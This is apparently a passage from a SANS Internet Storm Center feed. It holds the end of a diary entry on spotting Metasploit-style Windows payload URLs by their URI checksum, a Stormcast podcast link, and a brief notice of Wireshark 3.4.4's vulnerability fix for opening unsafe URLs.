metatool found 2 (identical) URLs whose path has an 8-bit checksum equal to 0x5C (92), or URI_CHECKSUM_INITW, i.e. the 8-bit checksum for a Windows payload.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 15.

ISC Stormcast For Monday, March 15th, 2021 https://isc.sans.edu/podcastdetail.html&#x3f;id=7412, (Mon, Mar 15th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
2021. március 14.

Wireshark 3.4.4 Released, (Sun, Mar 14th)

Wireshark version 3.4.4 was released.

There's one vulnerability fix and many bug fixes.

The vulnerability is that Wireshark could open unsafe URLs, as illustrated in a video posted with the bug report.

 

Didier Stevens

Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.